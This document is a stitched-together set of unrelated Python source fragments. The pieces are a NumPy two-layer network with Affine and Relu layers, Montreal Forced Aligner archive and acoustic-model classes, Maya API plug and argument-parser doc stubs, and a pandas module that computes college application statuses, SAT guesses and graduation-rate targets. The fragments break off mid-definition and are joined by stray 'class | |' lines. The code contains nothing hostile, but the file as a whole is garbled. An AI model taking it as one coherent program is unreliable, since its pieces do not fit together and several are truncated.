        self.params['W1'] = np.array([[1,2,3],[4,5,6]])  # (2, 3)
        self.params['b1'] = np.array([1,2,3], ndmin=2)   # (1, 3) — ndmin=2 makes this a row matrix
        self.params['W2'] = np.array([[1,2,3],[4,5,6], [7,8,9]])  # (3, 3)
        self.params['b2'] = np.array([1,2,3], ndmin=2)   # (1, 3)
        # Build the layers in forward order; OrderedDict preserves that order
        self.layers = OrderedDict()
        self.layers['Affine1'] = Affine(self.params['W1'], self.params['b1'])
        self.layers['Relu1'] = Relu()
        self.layers['Affine2'] = Affine(self.params['W2'], self.params['b2'])
        self.lastLayer = SoftmaxWithLoss()

    def predict(self, x):
        """Run the forward pass through every layer except the loss layer."""
        for layer in self.layers.values():
            x = layer.forward(x)
        return x

    # x: input data, t: target labels
    def loss(self, x, t):
        """Return the softmax cross-entropy loss for inputs x and targets t."""
        y = self.predict(x)
        return self.lastLayer.forward(y, t)

    def accuracy(self, x, t):
        """Fraction of rows whose argmax prediction matches the target."""
        y = self.predict(x)
        y = np.argmax(y, axis=1)
        if t.ndim != 1: t = np.argmax(t, axis=1)  # one-hot targets -> class ids
        accuracy = np.sum(y == t) / float(x.shape[0])
        return accuracy

    # x: input data, t: target labels
    def gradient(self, x, t):
        """Compute parameter gradients by backpropagation.

        Relies on the Affine layers caching dW/db on themselves during
        their backward pass (see the Affine class defined below).
        """
        # forward
        self.loss(x, t)
        # backward
        dout = 1
        dout = self.lastLayer.backward(dout)
        layers = list(self.layers.values())
        layers.reverse()  # backprop visits layers in reverse forward order
        for layer in layers:
            dout = layer.backward(dout)
        # Collect the gradients stored on each Affine layer
        grads = {}
        grads['W1'], grads['b1'] = self.layers['Affine1'].dW, self.layers['Affine1'].db
        grads['W2'], grads['b2'] = self.layers['Affine2'].dW, self.layers['Affine2'].db
        return grads
class Relu:
    """Rectified-linear-unit layer used by TwoLayerNet above."""

    def __init__(self):
        self.mask = None  # True where the last forward input was <= 0

    def forward(self, x):
        """Element-wise max(x, 0); remembers which entries were clipped."""
        self.mask = x <= 0
        return np.where(self.mask, 0, x)

    def backward(self, dout):
        """Kill the gradient where forward clipped (mutates ``dout`` in place)."""
        dout[self.mask] = 0
        return dout
class Affine:
    """Batch-aware affine layer that caches its input and parameter grads."""

    def __init__(self, W, b):
        self.W = W       # weights, shape (in_features, out_features)
        self.b = b       # bias, broadcast-added to every row
        self.x = None    # input remembered by forward, consumed by backward
        # Parameter gradients, filled in by backward
        self.dW = None
        self.db = None

    def forward(self, x):
        """Compute x·W + b, remembering x for the backward pass."""
        self.x = x
        return np.dot(self.x, self.W) + self.b

    def backward(self, dout):
        """Propagate ``dout``: store dW/db on the instance, return dx.

        The bias was broadcast-added to every row during forward, so its
        gradient is the column-wise sum of the upstream gradient.
        """
        self.db = dout.sum(axis=0)
        self.dW = self.x.T.dot(dout)
        return dout.dot(self.W.T)
class | |
"""Class definitions for Montreal Forced Aligner models"""
from __future__ import annotations
import os
from shutil import copy, copyfile, make_archive, move, rmtree, unpack_archive
from typing import TYPE_CHECKING, Any, Collection, Dict, Optional, Union
import yaml
from .exceptions import (
LanguageModelNotFoundError,
ModelLoadError,
PronunciationAcousticMismatchError,
)
from .helper import TerminalPrinter
if TYPE_CHECKING:
from logging import Logger
from .aligner.adapting import AdaptingAligner
from .config import FeatureConfig
from .config.train_config import TrainingConfig
from .dictionary import Dictionary
from .lm.trainer import LmTrainer
from .trainers import BaseTrainer
TrainerType = Union[BaseTrainer, LmTrainer, AdaptingAligner]
MetaDict = Dict[str, Any]
# default format for output
FORMAT = "zip"
__all__ = [
"Archive",
"LanguageModel",
"AcousticModel",
"IvectorExtractor",
"DictionaryModel",
"G2PModel",
"MODEL_TYPES",
]
class Archive:
    """
    Class representing data in a directory or archive file (zip, tar,
    tar.gz/tgz)
    Based on the prosodylab-aligner
    (https://github.com/prosodylab/Prosodylab-Aligner) archive class.
    Parameters
    ----------
    source: str
        Source path
    root_directory: str
        Root directory to unpack and store temporary files
    """

    # Archive file extensions accepted by this model type (subclasses extend)
    extensions = [".zip"]

    def __init__(self, source: str, root_directory: Optional[str] = None):
        # Local import avoids a circular import at module load time
        from .config import TEMP_DIR
        if root_directory is None:
            root_directory = TEMP_DIR
        self.root_directory = root_directory
        self.source = source
        self._meta = {}  # lazily populated by the `meta` property
        self.name, _ = os.path.splitext(os.path.basename(source))
        if os.path.isdir(source):
            # Already-unpacked model directory: use it in place.
            self.dirname = os.path.abspath(source)
        else:
            # Packed archive: unpack once into the root directory and cache.
            self.dirname = os.path.join(root_directory, self.name)
            if not os.path.exists(self.dirname):
                os.makedirs(root_directory, exist_ok=True)
                unpack_archive(source, self.dirname)
                files = os.listdir(self.dirname)
                old_dir_path = os.path.join(self.dirname, files[0])
                if len(files) == 1 and os.path.isdir(old_dir_path):  # Backwards compatibility
                    # Flatten archives that wrapped everything in a single
                    # top-level subdirectory.
                    for f in os.listdir(old_dir_path):
                        move(os.path.join(old_dir_path, f), os.path.join(self.dirname, f))
                    os.rmdir(old_dir_path)

    def get_subclass_object(
        self,
    ) -> Union[AcousticModel, G2PModel, LanguageModel, IvectorExtractor]:
        """
        Instantiate subclass models based on files contained in the archive
        Returns
        -------
        Union[AcousticModel, G2PModel, LanguageModel, IvectorExtractor]
            Subclass model that was auto detected
        """
        # Detection is by marker file: each model type ships a distinctive file.
        for f in os.listdir(self.dirname):
            if f == "tree":
                return AcousticModel(self.dirname, self.root_directory)
            if f == "phones.sym":
                return G2PModel(self.dirname, self.root_directory)
            if f.endswith(".arpa"):
                return LanguageModel(self.dirname, self.root_directory)
            if f == "final.ie":
                return IvectorExtractor(self.dirname, self.root_directory)
        raise ModelLoadError(self.source)

    @classmethod
    def valid_extension(cls, filename: str) -> bool:
        """
        Check whether a file has a valid extension for the given model archive
        Parameters
        ----------
        filename: str
            File name to check
        Returns
        -------
        bool
            True if the extension matches the models allowed extensions
        """
        if os.path.splitext(filename)[1] in cls.extensions:
            return True
        return False

    @classmethod
    def generate_path(cls, root: str, name: str, enforce_existence: bool = True) -> Optional[str]:
        """
        Generate a path for a given model from the root directory and the name of the model
        Parameters
        ----------
        root: str
            Root directory for the full path
        name: str
            Name of the model
        enforce_existence: bool
            Flag to return None if the path doesn't exist, defaults to True
        Returns
        -------
        str
            Full path in the root directory for the model
        """
        # First extension that exists wins; with enforce_existence=False the
        # first candidate path is returned unconditionally.
        for ext in cls.extensions:
            path = os.path.join(root, name + ext)
            if os.path.exists(path) or not enforce_existence:
                return path
        return None

    def pretty_print(self):
        """
        Pretty print the archive's meta data using TerminalPrinter
        """
        printer = TerminalPrinter()
        configuration_data = {"Archive": {"name": (self.name, "green"), "data": self.meta}}
        printer.print_config(configuration_data)

    @property
    def meta(self) -> dict:
        """
        Get the meta data associated with the model
        """
        # Loaded lazily and cached; NOTE(review): raises FileNotFoundError if
        # the archive has no meta.yaml (subclasses may override with defaults).
        if not self._meta:
            meta_path = os.path.join(self.dirname, "meta.yaml")
            with open(meta_path, "r", encoding="utf8") as f:
                self._meta = yaml.safe_load(f)
        return self._meta

    def add_meta_file(self, trainer: TrainerType) -> None:
        """
        Add a metadata file from a given trainer to the model
        Parameters
        ----------
        trainer: TrainerType
            The trainer to construct the metadata from
        """
        with open(os.path.join(self.dirname, "meta.yaml"), "w", encoding="utf8") as f:
            yaml.dump(trainer.meta, f)

    @classmethod
    def empty(cls, head: str, root_directory: Optional[str] = None) -> Archive:
        """
        Initialize an archive using an empty directory
        Parameters
        ----------
        head: str
            Directory name to create
        root_directory: str, optional
            Root directory to create temporary data, defaults to the MFA temporary directory
        Returns
        -------
        Archive
            Model constructed from the empty directory
        """
        from .config import TEMP_DIR
        if root_directory is None:
            root_directory = TEMP_DIR
        os.makedirs(root_directory, exist_ok=True)
        source = os.path.join(root_directory, head)
        os.makedirs(source, exist_ok=True)
        return cls(source)

    def add(self, source: str):
        """
        Add file into archive
        Parameters
        ----------
        source: str
            Path to file to copy into the directory
        """
        copy(source, self.dirname)

    def __repr__(self) -> str:
        """Representation string of a model"""
        return f"{self.__class__.__name__}(dirname={self.dirname!r})"

    def clean_up(self) -> None:
        """Remove temporary directory"""
        rmtree(self.dirname)

    def dump(self, path: str, archive_fmt: str = FORMAT) -> str:
        """
        Write archive to disk, and return the name of final archive
        Parameters
        ----------
        path: str
            Path to write to
        archive_fmt: str, optional
            Archive extension to use, defaults to ".zip"
        Returns
        -------
        str
            Path of constructed archive
        """
        # os.path.split supplies make_archive's (root_dir, base_dir) pair so
        # the archive contains the model directory itself.
        return make_archive(os.path.splitext(path)[0], archive_fmt, *os.path.split(self.dirname))
class AcousticModel(Archive):
    """
    Class for storing acoustic models in MFA, exported as zip files containing the necessary Kaldi files
    to be reused
    """

    # Kaldi artifacts copied in/out of the archive by add_model/export_model
    files = ["final.mdl", "final.alimdl", "final.occs", "lda.mat", "tree"]
    extensions = [".zip", ".am"]

    def add_meta_file(self, aligner: TrainerType) -> None:
        """
        Add metadata file from a model trainer
        Parameters
        ----------
        aligner: TrainerType
            Trainer to supply metadata information about the acoustic model
        """
        with open(os.path.join(self.dirname, "meta.yaml"), "w", encoding="utf8") as f:
            yaml.dump(aligner.meta, f)

    @property
    def feature_config(self) -> FeatureConfig:
        """
        Return the FeatureConfig used in training the model
        """
        # Local import keeps module load free of the config dependency cycle
        from .config.feature_config import FeatureConfig
        fc = FeatureConfig()
        fc.update(self.meta["features"])
        return fc

    def adaptation_config(self) -> TrainingConfig:
        """
        Generate an adaptation configuration
        Returns
        -------
        TrainingConfig
            Configuration to be used in adapting the acoustic model to new data
        """
        from .config.train_config import load_no_sat_adapt, load_sat_adapt
        # Speaker-adapted models get the fMLLR-aware adaptation recipe.
        # NOTE(review): the accompanying align config is discarded here.
        if self.meta["features"]["fmllr"]:
            train, align = load_sat_adapt()
        else:
            train, align = load_no_sat_adapt()
        return train

    @property
    def meta(self) -> MetaDict:
        """
        Metadata information for the acoustic model
        """
        default_features = {
            "type": "mfcc",
            "use_energy": False,
            "frame_shift": 10,
            "pitch": False,
            "fmllr": True,
        }
        if not self._meta:
            meta_path = os.path.join(self.dirname, "meta.yaml")
            if not os.path.exists(meta_path):
                # Very old models shipped without metadata; assume 0.9.0-era defaults.
                self._meta = {
                    "version": "0.9.0",
                    "architecture": "gmm-hmm",
                    "multilingual_ipa": False,
                    "features": default_features,
                }
            else:
                with open(meta_path, "r", encoding="utf8") as f:
                    self._meta = yaml.safe_load(f)
            # Normalize legacy string feature spec into the dict form.
            if self._meta["features"] == "mfcc+deltas":
                self._meta["features"] = default_features
            if "uses_lda" not in self._meta:  # Backwards compatibility
                # Infer LDA usage from the presence of the transform matrix.
                self._meta["uses_lda"] = os.path.exists(os.path.join(self.dirname, "lda.mat"))
            if "multilingual_ipa" not in self._meta:
                self._meta["multilingual_ipa"] = False
            if "uses_sat" not in self._meta:
                self._meta["uses_sat"] = False
            if "phone_type" not in self._meta:
                self._meta["phone_type"] = "triphone"
            self._meta["phones"] = set(self._meta.get("phones", []))
            # A speaker-independent alignment model is optional in the archive.
            self._meta["has_speaker_independent_model"] = os.path.exists(
                os.path.join(self.dirname, "final.alimdl")
            )
        return self._meta

    def pretty_print(self) -> None:
        """
        Prints the metadata information to the terminal
        """
        from .utils import get_mfa_version
        printer = TerminalPrinter()
        configuration_data = {"Acoustic model": {"name": (self.name, "green"), "data": {}}}
        # Highlight a version mismatch with the running MFA in red.
        version_color = "green"
        if self.meta["version"] != get_mfa_version():
            version_color = "red"
        configuration_data["Acoustic model"]["data"]["Version"] = (
            self.meta["version"],
            version_color,
        )
        if "citation" in self.meta:
            configuration_data["Acoustic model"]["data"]["Citation"] = self.meta["citation"]
        if "train_date" in self.meta:
            configuration_data["Acoustic model"]["data"]["Train date"] = self.meta["train_date"]
        configuration_data["Acoustic model"]["data"]["Architecture"] = self.meta["architecture"]
        configuration_data["Acoustic model"]["data"]["Phone type"] = self.meta["phone_type"]
        configuration_data["Acoustic model"]["data"]["Features"] = {
            "Type": self.meta["features"]["type"],
            "Frame shift": self.meta["features"]["frame_shift"],
        }
        if self.meta["phones"]:
            configuration_data["Acoustic model"]["data"]["Phones"] = self.meta["phones"]
        else:
            configuration_data["Acoustic model"]["data"]["Phones"] = ("None found!", "red")
        configuration_data["Acoustic model"]["data"]["Configuration options"] = {
            "Multilingual IPA": self.meta["multilingual_ipa"],
            "Performs speaker adaptation": self.meta["uses_sat"],
            "Has speaker-independent model": self.meta["has_speaker_independent_model"],
            "Performs LDA on features": self.meta["uses_lda"],
        }
        printer.print_config(configuration_data)

    def add_model(self, source: str) -> None:
        """
        Add file into archive
        Parameters
        ----------
        source: str
            File to add
        """
        # Copy only the known Kaldi files; missing optional files are skipped.
        for f in self.files:
            if os.path.exists(os.path.join(source, f)):
                copyfile(os.path.join(source, f), os.path.join(self.dirname, f))

    def export_model(self, destination: str) -> None:
        """
        Extract the model files to a new directory
        Parameters
        ----------
        destination: str
            Destination directory to extract files to
        """
        os.makedirs(destination, exist_ok=True)
        for f in self.files:
            if os.path.exists(os.path.join(self.dirname, f)):
                copyfile(os.path.join(self.dirname, f), os.path.join(destination, f))

    def log_details(self, logger: Logger) -> None:
        """
        Log metadata information to a logger
        Parameters
        ----------
        logger: :class:`~logging.Logger`
            Logger to send debug information to
        """
        logger.debug("")
        logger.debug("====ACOUSTIC MODEL INFO====")
        logger.debug("Acoustic model root directory: " + self.root_directory)
        logger.debug("Acoustic model dirname: " + self.dirname)
        meta_path = os.path.join(self.dirname, "meta.yaml")
        logger.debug("Acoustic model meta path: " + meta_path)
        if not os.path.exists(meta_path):
            logger.debug("META.YAML DOES NOT EXIST, this may cause issues in validating the model")
        logger.debug("Acoustic model meta information:")
        stream = yaml.dump(self.meta)
        logger.debug(stream)
        logger.debug("")

    def validate(self, dictionary: Union[Dictionary, G2PModel]) -> None:
        """
        Validate this acoustic model against a pronunciation dictionary or G2P model to ensure their
        phone sets are compatible
        Parameters
        ----------
        dictionary: Union[Dictionary, G2PModel]
            Dictionary or G2P model to compare phone sets with
        Raises
        ------
        PronunciationAcousticMismatchError
            If there are phones missing from the acoustic model
        """
        # Phones present in the dictionary/G2P model but absent from this
        # acoustic model make alignment impossible.
        if isinstance(dictionary, G2PModel):
            missing_phones = dictionary.meta["phones"] - set(self.meta["phones"])
        else:
            missing_phones = dictionary.nonsil_phones - set(self.meta["phones"])
        if missing_phones:
            raise (PronunciationAcousticMismatchError(missing_phones))
class IvectorExtractor(Archive):
"""
Model class for IvectorExtractor
"""
model_files = [
"final.ie",
"final.ubm",
"final.dubm",
"plda",
"mean.vec",
"trans.mat",
]
| |
asBool(*args, **kwargs):
"""
Retrieves the plug's value, as a boolean.
"""
pass
    def asChar(*args, **kwargs):
        """
        Retrieves the plug's value, as a single-byte integer.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def asDouble(*args, **kwargs):
        """
        Retrieves the plug's value, as a double-precision float.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def asFloat(*args, **kwargs):
        """
        Retrieves the plug's value, as a single-precision float.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def asInt(*args, **kwargs):
        """
        Retrieves the plug's value, as a regular integer.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def asMAngle(*args, **kwargs):
        """
        Retrieves the plug's value, as an MAngle.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def asMDistance(*args, **kwargs):
        """
        Retrieves the plug's value, as an MDistance.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def asMObject(*args, **kwargs):
        """
        Retrieves the plug's value, as an MObject containing a direct reference to the plug's data.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def asMTime(*args, **kwargs):
        """
        Retrieves the plug's value, as an MTime.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def asShort(*args, **kwargs):
        """
        Retrieves the plug's value, as a short integer.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def asString(*args, **kwargs):
        """
        Retrieves the plug's value, as a string.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def attribute(*args, **kwargs):
        """
        Returns the attribute currently referenced by this plug.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def child(*args, **kwargs):
        """
        Returns a plug for the specified child attribute of this plug.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def connectedTo(*args, **kwargs):
        """
        Returns an array of plugs which are connected to this one.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def connectionByPhysicalIndex(*args, **kwargs):
        """
        Returns a plug for the index'th connected element of this plug.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def constructHandle(*args, **kwargs):
        """
        Constructs a data handle for the plug.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def destructHandle(*args, **kwargs):
        """
        Destroys a data handle previously constructed using constructHandle().
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def elementByLogicalIndex(*args, **kwargs):
        """
        Returns a plug for the element of this plug array having the specified logical index.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def elementByPhysicalIndex(*args, **kwargs):
        """
        Returns a plug for the element of this plug array having the specified physical index.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def evaluateNumElements(*args, **kwargs):
        """
        Like numElements() but evaluates all connected elements first to ensure that they are included in the count.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def getExistingArrayAttributeIndices(*args, **kwargs):
        """
        Returns an array of all the plug's logical indices which are currently in use.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def getSetAttrCmds(*args, **kwargs):
        """
        Returns a list of strings containing the setAttr commands (in MEL syntax) for this plug and all of its descendents.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def isFreeToChange(*args, **kwargs):
        """
        Returns a value indicating if the plug's value can be changed, after taking into account the effects of locking and connections.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def logicalIndex(*args, **kwargs):
        """
        Returns this plug's logical index within its parent array.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def name(*args, **kwargs):
        """
        Returns the name of the plug.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def node(*args, **kwargs):
        """
        Returns the node that this plug belongs to.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def numChildren(*args, **kwargs):
        """
        Returns the number of children this plug has.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def numConnectedChildren(*args, **kwargs):
        """
        Returns the number of this plug's children which have connections.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def numConnectedElements(*args, **kwargs):
        """
        Returns the number of this plug's elements which have connections.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def numElements(*args, **kwargs):
        """
        Returns the number of the plug's logical indices which are currently in use. Connected elements which have not yet been evaluated may not yet fully exist and may be excluded from the count.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def parent(*args, **kwargs):
        """
        Returns a plug for the parent of this plug.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def partialName(*args, **kwargs):
        """
        Returns the name of the plug, formatted according to various criteria.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def selectAncestorLogicalIndex(*args, **kwargs):
        """
        Changes the logical index of the specified attribute in the plug's path.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def setAttribute(*args, **kwargs):
        """
        Switches the plug to reference the given attribute of the same node as the previously referenced attribute.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def setBool(*args, **kwargs):
        """
        Sets the plug's value as a boolean.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def setChar(*args, **kwargs):
        """
        Sets the plug's value as a single-byte integer.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def setDouble(*args, **kwargs):
        """
        Sets the plug's value as a double-precision float.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def setFloat(*args, **kwargs):
        """
        Sets the plug's value as a single-precision float.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def setInt(*args, **kwargs):
        """
        Sets the plug's value as a regular integer.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def setMAngle(*args, **kwargs):
        """
        Sets the plug's value as an MAngle.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def setMDataHandle(*args, **kwargs):
        """
        Sets the plug's value as a data handle.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def setMDistance(*args, **kwargs):
        """
        Sets the plug's value as an MDistance.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def setMObject(*args, **kwargs):
        """
        Sets the plug's value as an MObject.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def setMPxData(*args, **kwargs):
        """
        Sets the plug's value using custom plug-in data.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def setMTime(*args, **kwargs):
        """
        Sets the plug's value as an MTime.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def setNumElements(*args, **kwargs):
        """
        Pre-allocates space for count elements in an array of plugs.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def setShort(*args, **kwargs):
        """
        Sets the plug's value as a short integer.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
    def setString(*args, **kwargs):
        """
        Sets the plug's value as a string.
        """
        # Doc stub: body intentionally empty; presumably bound to Maya's compiled API at runtime.
        pass
info = None
isArray = None
isCaching = None
isChannelBox = None
isChild = None
isCompound = None
isConnected = None
isDestination = None
isDynamic = None
isElement = None
isFromReferencedFile = None
isIgnoredWhenRendering = None
isKeyable = None
isLocked = None
isNetworked = None
isNull = None
isProcedural = None
isSource = None
__new__ = None
kAll = 0
kChanged = 2
kChildrenNotFreeToChange = 2
kFreeToChange = 0
kLastAttrSelector = 3
kNonDefault = 1
kNotFreeToChange = 1
class MArgParser(object):
"""
Command argument list parser.
"""
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def commandArgumentBool(*args, **kwargs):
"""
commandArgumentBool(argIndex) -> bool
Returns the specified command argument as a bool.
"""
pass
def commandArgumentDouble(*args, **kwargs):
"""
Alias for commandArgumentFloat().
"""
pass
def commandArgumentFloat(*args, **kwargs):
"""
commandArgumentFloat(argIndex) -> float
Returns the specified command argument as a float.
"""
pass
def commandArgumentInt(*args, **kwargs):
"""
commandArgumentInt(argIndex) -> int
Returns the specified command argument as an int.
"""
pass
def commandArgumentMAngle(*args, **kwargs):
"""
commandArgumentMAngle(argIndex) -> MAngle
Returns the specified command argument as an MAngle.
"""
pass
def commandArgumentMDistance(*args, **kwargs):
"""
commandArgumentMDistance(argIndex) -> MDistance
Returns the specified command argument as an MDistance.
"""
pass
def commandArgumentMTime(*args, **kwargs):
"""
commandArgumentMTime(argIndex) -> MTime
Returns the specified command argument as an MTime.
"""
pass
def commandArgumentString(*args, **kwargs):
"""
commandArgumentString(argIndex) -> unicode string
Returns the specified command argument as a string.
"""
pass
def flagArgumentBool(*args, **kwargs):
"""
flagArgumentBool(flagName, argIndex) -> bool
Returns the specified argument of the specified single-use flag as
a bool.
"""
pass
def flagArgumentDouble(*args, **kwargs):
"""
flagArgumentDouble(flagName, argIndex) -> float
Alias for flagArgumentFloat().
"""
pass
def flagArgumentFloat(*args, **kwargs):
"""
flagArgumentFloat(flagName, argIndex) -> float
Returns the specified argument of the specified single-use flag as
a | |
# Repo: NobleNetworkCharterSchools/award-letters — file: modules/basedata.py
#!python3
"""
Module for working with raw csv inputs and creating a 'clean' set of tables
to push to Google Docs (before adding what's already in those docs).
"""
import numpy as np
import pandas as pd
# The following functions are all used to add calculations to the main table
def _get_final_result(x):
"""Apply function for providing a final status of the application"""
result_code, attending, waitlisted, deferred, stage, app_type = x
if result_code == "denied":
return "Denied"
elif result_code in ["accepted", "cond. accept", "summer admit"]:
if attending == "yes":
return "CHOICE!"
else:
return "Accepted!"
elif result_code == "guar. transfer":
return "Guar. Xfer"
elif (waitlisted == 1) | (waitlisted == "1"):
return "Waitlist"
elif (deferred == 1) | (deferred == "1"):
return "Deferred"
elif stage == "pending":
return "Pending"
elif stage in [
"initial materials submitted",
"mid-year submitted",
"final submitted",
]:
return "Submitted"
elif app_type == "interest":
return "Interest"
else:
return "?"
def _make_barrons_translation(x):
"""Apply function for a custom mapping of a text Barron's field to
a number"""
bar_dict = {
"Most Competitive+": 1,
"Most Competitive": 2,
"Highly Competitive": 3,
"Very Competitive": 4,
"Competitive": 5,
"Less Competitive": 6,
"Noncompetitive": 7,
"2 year (Noncompetitive)": 8,
"2 year (Competitive)": 8,
"Not Available": "N/A",
}
if x in bar_dict:
return bar_dict[x]
else:
return "?"
def _get_act_translation(x, lookup_df):
"""Apply function for calculating equivalent SAT for ACT scores.
Lookup table has index of ACT with value of SAT"""
act = x
if np.isreal(act):
if act in lookup_df.index: # it's an ACT value in the table
return lookup_df.loc[act, "SAT"]
return np.nan # default if not in table or not a number
def _get_sat_guess(x):
"""Returns a GPA guess based on regression constants from the
prior year. nan if GPA isn't a number"""
gpa = x
if np.isreal(gpa):
guess = 427.913068576 + 185.298880075 * gpa
return np.round(guess / 10.0) * 10.0
else:
return np.nan
def _pick_sat_for_use(x):
""" Returns the SAT we'll use in practice"""
sat_guess, interim, actual_sat = x
if np.isreal(actual_sat):
return actual_sat
elif np.isreal(interim):
return interim
elif np.isreal(sat_guess):
return sat_guess
else:
return np.nan
def _get_sat_max(x):
"""Returns the max of two values if both are numbers, otherwise
returns the numeric one or nan if neither is numeric"""
sat, act_in_sat = x
if np.isreal(sat):
if np.isreal(act_in_sat):
return max(sat, act_in_sat)
else:
return sat
else:
if np.isreal(act_in_sat):
return act_in_sat
else:
return np.nan
def _get_strategies(x, lookup_df):
"""Apply function for calculating strategies based on gpa and sat using the
lookup table (mirrors Excel equation for looking up strategy"""
gpa, sat = x
sat = sat if np.isreal(sat) else 710
if np.isreal(gpa):
lookup = "{:.1f}:{:.0f}".format(
max(np.floor(gpa * 10) / 10, 1.5), max(sat, 710)
)
return lookup_df["Strategy"].get(lookup, np.nan)
else:
return np.nan
def _safe2int(x):
try:
return int(x + 0)
except BaseException:
return x
def _get_gr_target(x, lookup_strat, goal_type):
"""Apply function to get the target or ideal grad rate for student"""
strat, gpa, efc, race = x
# 2 or 3 strategies are split by being above/below 3.0 GPA line
# First we identify those and then adjust the lookup index accordingly
special_strats = [int(x[0]) for x in lookup_strat.index if x[-1] == "+"]
if np.isreal(gpa) and np.isreal(strat):
# First define the row in the lookup table
strat_str = "{:.0f}".format(strat)
if strat in special_strats:
lookup = strat_str + "+" if gpa >= 3.0 else strat_str + "<"
else:
lookup = strat_str
# Then define the column in the lookup table
if efc == -1:
column = "minus1_" + goal_type
elif race in ["W", "A", "P"]:
column = "W/A_" + goal_type
else:
column = "AA/H_" + goal_type
return lookup_strat[column].get(lookup, np.nan)
else:
return np.nan
def _make_final_gr(x):
"""Apply function to do graduation rates"""
race, sixyrgr, sixyrgraah, comments = x
first_gr = sixyrgraah if race in ["B", "H", "M", "I"] else sixyrgr
if comments == "Posse":
return (first_gr + 0.15) if first_gr < 0.7 else (1.0 - (1.0 - first_gr) / 2)
else:
return first_gr
# Finally, the main function that calls these
def add_strat_and_grs(df, strat_df, target_df, acttosat_df, campus, debug):
    """
    Adds Strategy and Target/Ideal grad rate numbers to the roster table

    Args (shapes assumed from usage below -- confirm against callers):
        df: roster DataFrame with Campus, ACT, GPA, InterimSAT, SAT,
            EFC, and 'Race/ Eth' columns
        strat_df: strategy lookup table indexed by "gpa:sat" strings
        target_df: target/ideal grad-rate lookup table
        acttosat_df: ACT->SAT conversion table (index ACT, column SAT)
        campus: campus name to filter on, or "All" for no filtering
        debug: if True, print the resulting roster length

    Returns a new DataFrame; the input is not mutated.
    """
    df = df.copy()  # never mutate the caller's frame
    if campus != "All":
        df = df[df["Campus"] == campus]
    # Build up the SAT to use: ACT-converted score, regression guess from
    # GPA, the best available of guess/interim/actual, then the max of
    # that and the ACT equivalent.
    df["local_act_in_sat"] = df["ACT"].apply(_get_act_translation, args=(acttosat_df,))
    df["local_sat_guess"] = df["GPA"].apply(_get_sat_guess)
    df["local_sat_used"] = df[["local_sat_guess", "InterimSAT", "SAT"]].apply(
        _pick_sat_for_use, axis=1
    )
    df["local_sat_max"] = df[["local_sat_used", "local_act_in_sat"]].apply(
        _get_sat_max, axis=1
    )
    # "Stra-tegy" (with hyphen) is the exact column name referenced below
    # and downstream; do not "fix" the spelling.
